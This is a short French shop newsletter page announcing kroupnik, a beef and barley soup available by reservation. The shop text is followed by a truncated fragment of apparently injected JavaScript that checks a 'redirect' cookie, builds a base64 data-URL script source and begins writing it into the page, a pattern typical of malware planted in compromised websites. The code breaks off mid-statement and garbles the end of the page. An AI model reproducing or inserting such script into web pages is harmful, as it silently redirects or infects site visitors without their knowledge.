• Français
  • Anglais
  • Espagnol
  • Hébreu



Le kroupnik…

Newsletter KROUPNIK 2

Ce “bouillon” à la viande de boeuf coupée en petits morceaux, préparée avec des gros tsiké bobess,

de l’orge perlée et des légumes de pot-au-feu coupés menu…

…un vrai régal…

Votre plat sera disponible à la boutique  (uniquement sur réservation)

pour le déguster jusqu’à dimanche au plus tard

(si vous souhaitez le garder au-delà de dimanche, nous vous conseillons de le congeler dès vendredi).

Vous pouvez réserver dès à présent le nombre de parts qu’il vous faudra par retour de mail

ou par téléphone au 01 48 87 92 85.

(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,.”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘